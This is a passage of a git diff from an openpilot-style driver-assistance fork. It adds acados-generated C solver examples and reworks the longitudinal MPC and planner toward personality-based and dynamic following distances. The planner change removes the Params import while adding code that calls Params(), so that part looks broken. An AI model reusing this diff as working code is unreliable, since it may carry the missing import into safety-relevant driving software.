+#include "acados_c/external_function_interface.h" +#include "acados_solver_long.h" + +#define NX LONG_NX +#define NZ LONG_NZ +#define NU LONG_NU +#define NP LONG_NP +#define NBX LONG_NBX +#define NBX0 LONG_NBX0 +#define NBU LONG_NBU +#define NSBX LONG_NSBX +#define NSBU LONG_NSBU +#define NSH LONG_NSH +#define NSG LONG_NSG +#define NSPHI LONG_NSPHI +#define NSHN LONG_NSHN +#define NSGN LONG_NSGN +#define NSPHIN LONG_NSPHIN +#define NSBXN LONG_NSBXN +#define NS LONG_NS +#define NSN LONG_NSN +#define NG LONG_NG +#define NBXN LONG_NBXN +#define NGN LONG_NGN +#define NY0 LONG_NY0 +#define NY LONG_NY +#define NYN LONG_NYN +#define NH LONG_NH +#define NPHI LONG_NPHI +#define NHN LONG_NHN +#define NPHIN LONG_NPHIN +#define NR LONG_NR + + +int main() +{ + + long_solver_capsule *acados_ocp_capsule = long_acados_create_capsule(); + // there is an opportunity to change the number of shooting intervals in C without new code generation + int N = LONG_N; + // allocate the array and fill it accordingly + double* new_time_steps = NULL; + int status = long_acados_create_with_discretization(acados_ocp_capsule, N, new_time_steps); + + if (status) + { + printf("long_acados_create() returned status %d. Exiting.\n", status); + exit(1); + } + + ocp_nlp_config *nlp_config = long_acados_get_nlp_config(acados_ocp_capsule); + ocp_nlp_dims *nlp_dims = long_acados_get_nlp_dims(acados_ocp_capsule); + ocp_nlp_in *nlp_in = long_acados_get_nlp_in(acados_ocp_capsule); + ocp_nlp_out *nlp_out = long_acados_get_nlp_out(acados_ocp_capsule); + ocp_nlp_solver *nlp_solver = long_acados_get_nlp_solver(acados_ocp_capsule); + void *nlp_opts = long_acados_get_nlp_opts(acados_ocp_capsule); + + // initial condition + int idxbx0[NBX0]; + idxbx0[0] = 0; + idxbx0[1] = 1; + idxbx0[2] = 2; + + double lbx0[NBX0]; + double ubx0[NBX0]; + lbx0[0] = 0; + ubx0[0] = 0; + lbx0[1] = 0; + ubx0[1] = 0; + lbx0[2] = 0; + ubx0[2] = 0; + + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, 0, "idxbx", idxbx0); + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, 0, "lbx", lbx0); + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, 0, "ubx", ubx0); + + // initialization for state values + double x_init[NX]; + x_init[0] = 0.0; + x_init[1] = 0.0; + x_init[2] = 0.0; + + // initial value for control input + double u0[NU]; + u0[0] = 0.0; + // set parameters + double p[NP]; + p[0] = -1.2; + p[1] = 1.2; + p[2] = 0; + p[3] = 0; + p[4] = 1.45; + p[5] = 0.75; + + for (int ii = 0; ii <= N; ii++) + { + long_acados_update_params(acados_ocp_capsule, ii, p, NP); + } + + + // prepare evaluation + int NTIMINGS = 1; + double min_time = 1e12; + double kkt_norm_inf; + double elapsed_time; + int sqp_iter; + + double xtraj[NX * (N+1)]; + double utraj[NU * N]; + + + // solve ocp in loop + int rti_phase = 0; + + for (int ii = 0; ii < NTIMINGS; ii++) + { + // initialize solution + for (int i = 0; i < N; i++) + { + ocp_nlp_out_set(nlp_config, nlp_dims, nlp_out, i, "x", x_init); + ocp_nlp_out_set(nlp_config, nlp_dims, nlp_out, i, "u", u0); + } + ocp_nlp_out_set(nlp_config, nlp_dims, nlp_out, N, "x", x_init); + ocp_nlp_solver_opts_set(nlp_config, nlp_opts, "rti_phase", &rti_phase); + status = long_acados_solve(acados_ocp_capsule); + ocp_nlp_get(nlp_config, nlp_solver, "time_tot", &elapsed_time); + min_time = MIN(elapsed_time, min_time); + } + + /* print solution and statistics */ + for (int ii = 0; ii <= nlp_dims->N; ii++) + ocp_nlp_out_get(nlp_config, nlp_dims, nlp_out, ii, "x", &xtraj[ii*NX]); + for (int ii = 0; ii < nlp_dims->N; ii++) + ocp_nlp_out_get(nlp_config, nlp_dims, nlp_out, ii, "u", &utraj[ii*NU]); + + printf("\n--- xtraj ---\n"); + d_print_exp_tran_mat( NX, N+1, xtraj, NX); + printf("\n--- utraj ---\n"); + d_print_exp_tran_mat( NU, N, utraj, NU ); + // ocp_nlp_out_print(nlp_solver->dims, nlp_out); + + printf("\nsolved ocp %d times, solution printed above\n\n", NTIMINGS); + + if (status == ACADOS_SUCCESS) + { + printf("long_acados_solve(): SUCCESS!\n"); + } + else + { + printf("long_acados_solve() failed with status %d.\n", status); + } + + // get solution + ocp_nlp_out_get(nlp_config, nlp_dims, nlp_out, 0, "kkt_norm_inf", &kkt_norm_inf); + ocp_nlp_get(nlp_config, nlp_solver, "sqp_iter", &sqp_iter); + + long_acados_print_stats(acados_ocp_capsule); + + printf("\nSolver info:\n"); + printf(" SQP iterations %2d\n minimum time for %d solve %f [ms]\n KKT %e\n", + sqp_iter, NTIMINGS, min_time*1000, kkt_norm_inf); + + // free solver + status = long_acados_free(acados_ocp_capsule); + if (status) { + printf("long_acados_free() returned status %d. \n", status); + } + // free solver capsule + status = long_acados_free_capsule(acados_ocp_capsule); + if (status) { + printf("long_acados_free_capsule() returned status %d. \n", status); + } + + return status; +} diff --git a/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/main_sim_long.c b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/main_sim_long.c new file mode 100644 index 000000000..21165e164 --- /dev/null +++ b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/main_sim_long.c @@ -0,0 +1,130 @@ +/* + * Copyright 2019 Gianluca Frison, Dimitris Kouzoupis, Robin Verschueren, + * Andrea Zanelli, Niels van Duijkeren, Jonathan Frey, Tommaso Sartor, + * Branimir Novoselnik, Rien Quirynen, Rezart Qelibari, Dang Doan, + * Jonas Koenemann, Yutao Chen, Tobias Schöls, Jonas Schlagenhauf, Moritz Diehl + * + * This file is part of acados. + * + * The 2-Clause BSD License + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, + * this list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE + * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR + * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF + * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS + * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN + * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) + * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE + * POSSIBILITY OF SUCH DAMAGE.; + */ + + +// standard +#include +#include +// acados +#include "acados/utils/print.h" +#include "acados/utils/math.h" +#include "acados_c/sim_interface.h" +#include "acados_sim_solver_long.h" + +#define NX LONG_NX +#define NZ LONG_NZ +#define NU LONG_NU +#define NP LONG_NP + + +int main() +{ + int status = 0; + sim_solver_capsule *capsule = long_acados_sim_solver_create_capsule(); + status = long_acados_sim_create(capsule); + + if (status) + { + printf("acados_create() returned status %d. Exiting.\n", status); + exit(1); + } + + sim_config *acados_sim_config = long_acados_get_sim_config(capsule); + sim_in *acados_sim_in = long_acados_get_sim_in(capsule); + sim_out *acados_sim_out = long_acados_get_sim_out(capsule); + void *acados_sim_dims = long_acados_get_sim_dims(capsule); + + // initial condition + double x_current[NX]; + x_current[0] = 0.0; + x_current[1] = 0.0; + x_current[2] = 0.0; + + + x_current[0] = 0; + x_current[1] = 0; + x_current[2] = 0; + + + + + // initial value for control input + double u0[NU]; + u0[0] = 0.0; + // set parameters + double p[NP]; + p[0] = -1.2; + p[1] = 1.2; + p[2] = 0; + p[3] = 0; + p[4] = 1.45; + p[5] = 0.75; + + long_acados_sim_update_params(capsule, p, NP); + + + int n_sim_steps = 3; + // solve ocp in loop + for (int ii = 0; ii < n_sim_steps; ii++) + { + sim_in_set(acados_sim_config, acados_sim_dims, + acados_sim_in, "x", x_current); + status = long_acados_sim_solve(capsule); + + if (status != ACADOS_SUCCESS) + { + printf("acados_solve() failed with status %d.\n", status); + } + + sim_out_get(acados_sim_config, acados_sim_dims, + acados_sim_out, "x", x_current); + + printf("\nx_current, %d\n", ii); + for (int jj = 0; jj < NX; jj++) + { + printf("%e\n", x_current[jj]); + } + } + + printf("\nPerformed %d simulation steps with acados integrator successfully.\n\n", n_sim_steps); + + // free solver + status = long_acados_sim_free(capsule); + if (status) { + printf("long_acados_sim_free() returned status %d. \n", status); + } + + long_acados_sim_solver_free_capsule(capsule); + + return status; +} diff --git a/selfdrive/controls/lib/longitudinal_mpc_lib/long_mpc.py b/selfdrive/controls/lib/longitudinal_mpc_lib/long_mpc.py index 6d57d91ad..828e28a29 100644 --- a/selfdrive/controls/lib/longitudinal_mpc_lib/long_mpc.py +++ b/selfdrive/controls/lib/longitudinal_mpc_lib/long_mpc.py @@ -1,14 +1,13 @@ #!/usr/bin/env python3 import os import numpy as np -#from cereal import log -from common.conversions import Conversions as CV +from cereal import log from common.realtime import sec_since_boot -from common.numpy_fast import clip, interp +from common.numpy_fast import clip from system.swaglog import cloudlog # WARNING: imports outside of constants will not trigger a rebuild from selfdrive.modeld.constants import index_function -from selfdrive.controls.lib.radar_helpers import _LEAD_ACCEL_TAU +from selfdrive.controls.radard import _LEAD_ACCEL_TAU if __name__ == '__main__': # generating code from third_party.acados.acados_template import AcadosModel, AcadosOcp, AcadosOcpSolver @@ -55,49 +54,52 @@ FCW_IDXS = T_IDXS < 5.0 T_DIFFS = np.diff(T_IDXS, prepend=[0.]) MIN_ACCEL = -3.5 MAX_ACCEL = 2.0 -T_FOLLOW = 1.45 # dp added back -COMFORT_BRAKE = 2.7 -STOP_DISTANCE = 5.2 +COMFORT_BRAKE = 2.5 +STOP_DISTANCE = 6.0 -#def get_jerk_factor(personality=log.LongitudinalPersonality.standard): -# if personality==log.LongitudinalPersonality.relaxed: -# return 1.0 -# elif personality==log.LongitudinalPersonality.standard: -# return 1.0 -# elif personality==log.LongitudinalPersonality.aggressive: -# return 0.5 -# else: -# raise NotImplementedError("Longitudinal personality not supported") +def get_jerk_factor(personality=log.LongitudinalPersonality.standard): + if personality==log.LongitudinalPersonality.relaxed: + return 1.0 + elif personality==log.LongitudinalPersonality.standard: + return 1.0 + elif personality==log.LongitudinalPersonality.aggressive: + return 0.5 + else: + raise NotImplementedError("Longitudinal personality not supported") -#def get_T_FOLLOW(personality=log.LongitudinalPersonality.standard): -# if personality==log.LongitudinalPersonality.relaxed: -# return 1.75 -# elif personality==log.LongitudinalPersonality.standard: -# return 1.45 -# elif personality==log.LongitudinalPersonality.aggressive: -# return 1.25 -# else: -# raise NotImplementedError("Longitudinal personality not supported") +def get_T_FOLLOW(personality=log.LongitudinalPersonality.standard): + if personality==log.LongitudinalPersonality.relaxed: + return 1.75 + elif personality==log.LongitudinalPersonality.standard: + return 1.45 + elif personality==log.LongitudinalPersonality.aggressive: + return 1.25 + else: + raise NotImplementedError("Longitudinal personality not supported") -def get_stopped_equivalence_factor(v_lead, v_ego): - v_diff_offset = 0 - v_diff_offset_max = 12 - speed_to_reach_max_v_diff_offset = 26 # in kp/h - speed_to_reach_max_v_diff_offset = speed_to_reach_max_v_diff_offset * CV.KPH_TO_MS - delta_speed = v_lead - v_ego - if np.all(delta_speed > 0): - v_diff_offset = delta_speed * 2 - v_diff_offset = np.clip(v_diff_offset, 0, v_diff_offset_max) - # increase in a linear behavior - v_diff_offset = np.maximum(v_diff_offset * ((speed_to_reach_max_v_diff_offset - v_ego)/speed_to_reach_max_v_diff_offset), 0) - return (v_lead**2) / (2 * COMFORT_BRAKE) + v_diff_offset +def get_dynamic_follow(v_ego, personality=log.LongitudinalPersonality.standard): + if personality==log.LongitudinalPersonality.relaxed: + x_vel = [0, 11, 13, 15, 25, 40] + y_dist = [1.75, 1.75, 1.77, 1.75, 1.8, 1.8] + elif personality==log.LongitudinalPersonality.standard: + x_vel = [0, 11, 13, 15, 25, 40] + y_dist = [1.5, 1.5, 1.51, 1.5, 1.5, 1.45] + elif personality==log.LongitudinalPersonality.aggressive: + x_vel = [0, 11, 13, 15, 25, 40] + y_dist = [1.12, 1.12, 1.13, 1.12, 1.22, 1.22] + else: + raise NotImplementedError("Dynamic Follow personality not supported") + return np.interp(v_ego, x_vel, y_dist) -def get_safe_obstacle_distance(v_ego, t_follow=T_FOLLOW): +def get_stopped_equivalence_factor(v_lead): + return (v_lead**2) / (2 * COMFORT_BRAKE) + +def get_safe_obstacle_distance(v_ego, t_follow): return (v_ego**2) / (2 * COMFORT_BRAKE) + t_follow * v_ego + STOP_DISTANCE -def desired_follow_distance(v_ego, v_lead, t_follow=T_FOLLOW): - return get_safe_obstacle_distance(v_ego, t_follow) - get_stopped_equivalence_factor(v_lead, v_ego) +def desired_follow_distance(v_ego, v_lead, t_follow=get_T_FOLLOW()): + return get_safe_obstacle_distance(v_ego, t_follow) - get_stopped_equivalence_factor(v_lead) def gen_long_model(): @@ -193,7 +195,7 @@ def gen_long_ocp(): x0 = np.zeros(X_DIM) ocp.constraints.x0 = x0 - ocp.parameter_values = np.array([-1.2, 1.2, 0.0, 0.0, T_FOLLOW, LEAD_DANGER_FACTOR]) + ocp.parameter_values = np.array([-1.2, 1.2, 0.0, 0.0, get_T_FOLLOW(), LEAD_DANGER_FACTOR]) # We put all constraint cost weights to 0 and only set them at runtime @@ -234,7 +236,6 @@ class LongitudinalMpc: def __init__(self, mode='acc'): self.mode = mode self.solver = AcadosOcpSolverCython(MODEL_NAME, ACADOS_SOLVER_TYPE, N) - self.desired_TF = T_FOLLOW self.reset() self.source = SOURCES[2] @@ -267,16 +268,12 @@ class LongitudinalMpc: self.x0 = np.zeros(X_DIM) self.set_weights() - def set_cost_weights(self, cost_weights, constraint_cost_weights, cost_multipliers): + def set_cost_weights(self, cost_weights, constraint_cost_weights): W = np.asfortranarray(np.diag(cost_weights)) - if self.mode == 'acc': - a_change_tf = cost_weights[4] * cost_multipliers[0] - else: - a_change_tf = cost_weights[4] for i in range(N): # TODO don't hardcode A_CHANGE_COST idx # reduce the cost on (a-a_prev) later in the horizon. - W[4,4] = a_change_tf * np.interp(T_IDXS[i], [0.0, 1.0, 2.0], [1.0, 1.0, 0.0]) + W[4,4] = cost_weights[4] * np.interp(T_IDXS[i], [0.0, 1.0, 2.0], [1.0, 1.0, 0.0]) self.solver.cost_set(i, 'W', W) # Setting the slice without the copy make the array not contiguous, # causing issues with the C interface. @@ -287,19 +284,19 @@ class LongitudinalMpc: for i in range(N): self.solver.cost_set(i, 'Zl', Zl) - def set_weights(self, prev_accel_constraint=True, v_lead0=0, v_lead1=0): - cost_multipliers = self.get_cost_multipliers(v_lead0, v_lead1) + def set_weights(self, prev_accel_constraint=True, personality=log.LongitudinalPersonality.standard): + jerk_factor = get_jerk_factor(personality) if self.mode == 'acc': a_change_cost = A_CHANGE_COST if prev_accel_constraint else 0 - cost_weights = [X_EGO_OBSTACLE_COST, X_EGO_COST, V_EGO_COST, A_EGO_COST, a_change_cost * cost_multipliers[0], J_EGO_COST * cost_multipliers[1]] - constraint_cost_weights = [LIMIT_COST, LIMIT_COST, LIMIT_COST, DANGER_ZONE_COST * cost_multipliers[2]] + cost_weights = [X_EGO_OBSTACLE_COST, X_EGO_COST, V_EGO_COST, A_EGO_COST, jerk_factor * a_change_cost, jerk_factor * J_EGO_COST] + constraint_cost_weights = [LIMIT_COST, LIMIT_COST, LIMIT_COST, DANGER_ZONE_COST] elif self.mode == 'blended': a_change_cost = 40.0 if prev_accel_constraint else 0 cost_weights = [0., 0.1, 0.2, 5.0, a_change_cost, 1.0] constraint_cost_weights = [LIMIT_COST, LIMIT_COST, LIMIT_COST, 50.0] else: raise NotImplementedError(f'Planner mode {self.mode} not recognized in planner cost set') - self.set_cost_weights(cost_weights, constraint_cost_weights, cost_multipliers) + self.set_cost_weights(cost_weights, constraint_cost_weights) def set_cur_state(self, v, a): v_prev = self.x0[1] @@ -346,22 +343,21 @@ class LongitudinalMpc: self.cruise_min_a = min_a self.max_a = max_a - def update(self, radarstate, v_cruise, x, v, a, j, prev_accel_constraint, desired_tf=T_FOLLOW): - #self.t_follow = get_T_FOLLOW(personality) + # def update(self, radarstate, v_cruise, x, v, a, j, personality=log.LongitudinalPersonality.standard): + def update(self, radarstate, v_cruise, x, v, a, j, personality=log.LongitudinalPersonality.standard, use_df_tune=False): + # t_follow = get_T_FOLLOW(personality) v_ego = self.x0[1] + t_follow = get_T_FOLLOW(personality) if not use_df_tune else get_dynamic_follow(v_ego, personality) self.status = radarstate.leadOne.status or radarstate.leadTwo.status lead_xv_0 = self.process_lead(radarstate.leadOne) lead_xv_1 = self.process_lead(radarstate.leadTwo) - self.desired_TF = desired_tf - self.set_weights(prev_accel_constraint=prev_accel_constraint, v_lead0=lead_xv_0[0,1], v_lead1=lead_xv_1[0,1]) - # To estimate a safe distance from a moving lead, we calculate how much stopping # distance that lead needs as a minimum. We can add that to the current distance # and then treat that as a stopped car/obstacle at this new distance. - lead_0_obstacle = lead_xv_0[:,0] + get_stopped_equivalence_factor(lead_xv_0[:,1], self.x_sol[:,1]) - lead_1_obstacle = lead_xv_1[:,0] + get_stopped_equivalence_factor(lead_xv_1[:,1], self.x_sol[:,1]) + lead_0_obstacle = lead_xv_0[:,0] + get_stopped_equivalence_factor(lead_xv_0[:,1]) + lead_1_obstacle = lead_xv_1[:,0] + get_stopped_equivalence_factor(lead_xv_1[:,1]) self.params[:,0] = MIN_ACCEL self.params[:,1] = self.max_a @@ -377,7 +373,7 @@ class LongitudinalMpc: v_cruise_clipped = np.clip(v_cruise * np.ones(N+1), v_lower, v_upper) - cruise_obstacle = np.cumsum(T_DIFFS * v_cruise_clipped) + get_safe_obstacle_distance(v_cruise_clipped, self.desired_TF) + cruise_obstacle = np.cumsum(T_DIFFS * v_cruise_clipped) + get_safe_obstacle_distance(v_cruise_clipped, t_follow) x_obstacles = np.column_stack([lead_0_obstacle, lead_1_obstacle, cruise_obstacle]) self.source = SOURCES[np.argmin(x_obstacles[0])] @@ -411,7 +407,7 @@ class LongitudinalMpc: self.params[:,2] = np.min(x_obstacles, axis=1) self.params[:,3] = np.copy(self.prev_a) - self.params[:,4] = self.desired_TF + self.params[:,4] = t_follow self.run() if (np.any(lead_xv_0[FCW_IDXS,0] - self.x_sol[FCW_IDXS,0] < CRASH_DISTANCE) and @@ -423,9 +419,9 @@ class LongitudinalMpc: # Check if it got within lead comfort range # TODO This should be done cleaner if self.mode == 'blended': - if any((lead_0_obstacle - get_safe_obstacle_distance(self.x_sol[:,1], self.desired_TF))- self.x_sol[:,0] < 0.0): + if any((lead_0_obstacle - get_safe_obstacle_distance(self.x_sol[:,1], t_follow))- self.x_sol[:,0] < 0.0): self.source = 'lead0' - if any((lead_1_obstacle - get_safe_obstacle_distance(self.x_sol[:,1], self.desired_TF))- self.x_sol[:,0] < 0.0) and \ + if any((lead_1_obstacle - get_safe_obstacle_distance(self.x_sol[:,1], t_follow))- self.x_sol[:,0] < 0.0) and \ (lead_1_obstacle[0] - lead_0_obstacle[0]): self.source = 'lead1' @@ -469,26 +465,6 @@ class LongitudinalMpc: # reset = 1 # print(f"long_mpc timings: total internal {self.solve_time:.2e}, external: {(sec_since_boot() - t0):.2e} qp {self.time_qp_solution:.2e}, lin {self.time_linearization:.2e} qp_iter {qp_iter}, reset {reset}") - def get_cost_multipliers(self, v_lead0, v_lead1): - v_ego = self.x0[1] - v_ego_bps = [0, 10] - TFs = [1.0, 1.25, T_FOLLOW, 1.8] - # KRKeegan adjustments to costs for different TFs - # these were calculated using the test_longitudial.py deceleration tests - a_change_tf = interp(self.desired_TF, TFs, [.1, .8, 1., 1.1]) - j_ego_tf = interp(self.desired_TF, TFs, [.6, .8, 1., 1.1]) - d_zone_tf = interp(self.desired_TF, TFs, [1.6, 1.3, 1., 1.]) - # KRKeegan adjustments to improve sluggish acceleration - # do not apply to deceleration - j_ego_v_ego = 1 - a_change_v_ego = 1 - if (v_lead0 - v_ego >= 0) and (v_lead1 - v_ego >= 0): - j_ego_v_ego = interp(v_ego, v_ego_bps, [.05, 1.]) - a_change_v_ego = interp(v_ego, v_ego_bps, [.05, 1.]) - # Select the appropriate min/max of the options - j_ego = min(j_ego_tf, j_ego_v_ego) - a_change = min(a_change_tf, a_change_v_ego) - return a_change, j_ego, d_zone_tf if __name__ == "__main__": ocp = gen_long_ocp() diff --git a/selfdrive/controls/lib/longitudinal_planner.py b/selfdrive/controls/lib/longitudinal_planner.py index 9dc92387a..248e18748 100755 --- a/selfdrive/controls/lib/longitudinal_planner.py +++ b/selfdrive/controls/lib/longitudinal_planner.py @@ -8,18 +8,18 @@ from cereal import log import cereal.messaging as messaging from common.conversions import Conversions as CV from common.filter_simple import FirstOrderFilter -from common.params import Params from common.realtime import DT_MDL from selfdrive.modeld.constants import T_IDXS from selfdrive.controls.lib.longcontrol import LongCtrlState -from selfdrive.controls.lib.longitudinal_mpc_lib.long_mpc import LongitudinalMpc, MIN_ACCEL, MAX_ACCEL, T_FOLLOW +from selfdrive.controls.lib.longitudinal_mpc_lib.long_mpc import LongitudinalMpc, MIN_ACCEL, MAX_ACCEL from selfdrive.controls.lib.longitudinal_mpc_lib.long_mpc import T_IDXS as T_IDXS_MPC from selfdrive.controls.lib.drive_helpers import V_CRUISE_MAX, CONTROL_N, get_speed_error from system.swaglog import cloudlog from selfdrive.controls.lib.vision_turn_controller import VisionTurnController from selfdrive.controls.lib.speed_limit_controller import SpeedLimitController, SpeedLimitResolver from selfdrive.controls.lib.turn_speed_controller import TurnSpeedController -from selfdrive.controls.lib.events import Events +from selfdrive.controls.lib.accel_controller import AccelController +from selfdrive.controls.lib.dynamic_endtoend_controller import DynamicEndtoEndController LON_MPC_STEP = 0.2 # first step is 0.2s A_CRUISE_MIN = -1.2 @@ -30,55 +30,6 @@ A_CRUISE_MAX_BP = [0., 10.0, 25., 40.] _A_TOTAL_MAX_V = [1.7, 3.2] _A_TOTAL_MAX_BP = [20., 40.] -#DP_FOLLOWING_DIST = { -# 0: 1.0, -# 1: 1.2, -# 2: 1.4, -# 3: 1.8, -#} - -DP_ACCEL_ECO = 0 -DP_ACCEL_NORMAL = 1 -DP_ACCEL_SPORT = 2 - -# accel profile by @arne182 modified by cgw -_DP_CRUISE_MIN_V = [-0.765, -0.765, -0.80, -0.80, -0.75, -0.70] -_DP_CRUISE_MIN_V_ECO = [-0.760, -0.760, -0.76, -0.76, -0.70, -0.65] -_DP_CRUISE_MIN_V_SPORT = [-0.770, -0.770, -0.90, -1.00, -0.90, -0.80] -_DP_CRUISE_MIN_BP = [0., 15.66, 17.88, 20., 30., 55.] -#DP_CRUISE_MIN_BP in mph=[0., 18, 35, 40, 45, 67, 123] - -_DP_CRUISE_MAX_V = [3.4, 2.8, 1.8, 1.4, 1.06, .88, .68, .46, .35, .13] -_DP_CRUISE_MAX_V_ECO = [3.2, 2.6, 1.6, 1.2, .76, .62, .48, .36, .28, .09] -_DP_CRUISE_MAX_V_SPORT = [3.5, 3.0, 2.4, 2.9, 2.1, 1.7, 1.3, .9, .7, .5] -_DP_CRUISE_MAX_BP = [0., 3, 6., 8., 11., 15., 20., 25., 30., 55.] -#DP_CRUISE_MAX_BP in mph=[0., 6.7, 13, 18, 25, 33, 45, 56, 67, 123] - -# d-e2e, from modeldata.h -TRAJECTORY_SIZE = 33 - -_DP_E2E_LEAD_COUNT = 5 - -_DP_E2E_STOP_BP = [0., 10., 20., 30., 40., 50., 55.] -_DP_E2E_STOP_DIST = [10, 30., 50., 70., 80., 90., 120.] -_DP_E2E_STOP_COUNT = 3 - -_DP_E2E_SNG_COUNT = 3 -_DP_E2E_SNG_ACC_COUNT = 5 -_DP_E2E_SWAP_COUNT = 10 - -_DP_E2E_TF_COUNT = 5 -def dp_calc_cruise_accel_limits(v_ego, dp_profile): - if dp_profile == DP_ACCEL_ECO: - a_cruise_min = interp(v_ego, _DP_CRUISE_MIN_BP, _DP_CRUISE_MIN_V_ECO) - a_cruise_max = interp(v_ego, _DP_CRUISE_MAX_BP, _DP_CRUISE_MAX_V_ECO) - elif dp_profile == DP_ACCEL_SPORT: - a_cruise_min = interp(v_ego, _DP_CRUISE_MIN_BP, _DP_CRUISE_MIN_V_SPORT) - a_cruise_max = interp(v_ego, _DP_CRUISE_MAX_BP, _DP_CRUISE_MAX_V_SPORT) - else: - a_cruise_min = interp(v_ego, _DP_CRUISE_MIN_BP, _DP_CRUISE_MIN_V) - a_cruise_max = interp(v_ego, _DP_CRUISE_MAX_BP, _DP_CRUISE_MAX_V) - return a_cruise_min, a_cruise_max def get_max_accel(v_ego): return interp(v_ego, A_CRUISE_MAX_BP, A_CRUISE_MAX_VALS) @@ -101,30 +52,13 @@ def limit_accel_in_turns(v_ego, angle_steers, a_target, CP): class LongitudinalPlanner: def __init__(self, CP, init_v=0.0, init_a=0.0): - # dp - self.dp_accel_profile_ctrl = False - self.dp_accel_profile = DP_ACCEL_ECO - self.dp_following_profile_ctrl = False - self.dp_following_profile = 0 + # mapd self.cruise_source = 'cruise' self.vision_turn_controller = VisionTurnController(CP) self.speed_limit_controller = SpeedLimitController() - self.events = Events() self.turn_speed_controller = TurnSpeedController() - self.dp_e2e_adapt_ap = False - self.dp_e2e_adapt_fp = False - - # conditional e2e - self.dp_e2e_has_lead = False - self.dp_e2e_lead_last = False - self.dp_e2e_lead_count = 0 - self.dp_e2e_sng = False - self.dp_e2e_sng_count = 0 - self.dp_e2e_standstill_last = False - self.dp_e2e_swap_count = 0 - self.dp_e2e_stop_count = 0 - self.dp_e2e_tf_count = 0 - self.dp_e2e_tf = T_FOLLOW + self.accel_controller = AccelController() + self.dynamic_endtoend_controller = DynamicEndtoEndController() self.CP = CP self.mpc = LongitudinalMpc() @@ -138,104 +72,25 @@ class LongitudinalPlanner: self.a_desired_trajectory = np.zeros(CONTROL_N) self.j_desired_trajectory = np.zeros(CONTROL_N) self.solverExecutionTime = 0.0 - #self.params = Params() - #self.param_read_counter = 0 - #self.read_param() - #self.personality = log.LongitudinalPersonality.standard + self.params = Params() + self.param_read_counter = 0 + self.read_param() + self.personality = log.LongitudinalPersonality.standard + self.dp_long_use_df_tune = False - #def read_param(self): - #try: - # self.personality = int(self.params.get('LongitudinalPersonality')) - #except (ValueError, TypeError): - # self.personality = log.LongitudinalPersonality.standard - - def _set_dp_e2e_mode(self, mode, force=False): - reset_state = False - - if force: - self.dp_e2e_swap_count = 0 - if self.mpc.mode != mode: - reset_state = True - self.mpc.mode = mode - return reset_state - - # prevent switching in a short period of time. - if self.mpc.mode == mode: - self.dp_e2e_swap_count = 0 - else: - self.dp_e2e_swap_count += 1 - - if self.dp_e2e_swap_count >= _DP_E2E_SWAP_COUNT: - self.mpc.mode = mode - reset_state = True - - return reset_state - - def conditional_e2e(self, sm): - v_ego_kph = sm['carState'].vEgo * 3.6 - standstill = sm['carState'].standstill - - # lead detection with buffer - lead = sm['radarState'].leadOne - lead_dist = lead.dRel - - # make sure it see lead enough time - if lead.status != self.dp_e2e_lead_last: - self.dp_e2e_lead_count = 0 - else: - self.dp_e2e_lead_count += 1 - if self.dp_e2e_lead_count >= _DP_E2E_LEAD_COUNT: - self.dp_e2e_has_lead = lead.status - self.dp_e2e_lead_last = lead.status - - # when standstill, always e2e - if standstill: - self.dp_e2e_sng_count = 0 - self.dp_e2e_sng = False - return self._set_dp_e2e_mode('blended') - - if self.dp_e2e_standstill_last and not standstill: - self.dp_e2e_sng = True - - # when sng, we e2e for 0.5 secs - if self.dp_e2e_sng: - self.dp_e2e_sng_count += 1 - if self.dp_e2e_sng_count > _DP_E2E_SNG_COUNT: - if self.dp_e2e_sng_count > _DP_E2E_SNG_ACC_COUNT: - self.dp_e2e_sng = False - return self._set_dp_e2e_mode('acc', True) - return self._set_dp_e2e_mode('blended') - - # when we see a lead - if sm['dragonConf'].dpE2EConditionalVoacc and self.dp_e2e_has_lead: - # drive above conditional speed and lead is too close - if lead_dist <= v_ego_kph * self.dp_e2e_tf * interp(v_ego_kph, [50., 60., 80., 85, 90.], [1.25, 1.20, 1.10, 1.05, 1.]) / 3.6: - self.dp_e2e_tf_count += 1 - else: - self.dp_e2e_tf_count = 0 - if self.dp_e2e_tf_count > _DP_E2E_TF_COUNT: - return self._set_dp_e2e_mode('blended', True) - - # stop sign detection - md = sm['modelV2'] - if abs(sm['carState'].steeringAngleDeg) <= 60 and len(md.orientation.x) == len(md.position.x) == TRAJECTORY_SIZE: - if md.position.x[TRAJECTORY_SIZE - 1] < interp(v_ego_kph, _DP_E2E_STOP_BP, _DP_E2E_STOP_DIST): - self.dp_e2e_stop_count += 1 - else: - self.dp_e2e_stop_count = 0 - else: - self.dp_e2e_stop_count = 0 - - if self.dp_e2e_stop_count >= _DP_E2E_STOP_COUNT: - return self._set_dp_e2e_mode('blended', True) - - return self._set_dp_e2e_mode('acc') + def read_param(self): + try: + self.personality = int(self.params.get('LongitudinalPersonality')) + self.dp_long_use_df_tune = self.params.get_bool('dp_long_use_df_tune') + except (ValueError, TypeError): + self.personality = log.LongitudinalPersonality.standard + self.dp_long_use_df_tune = False 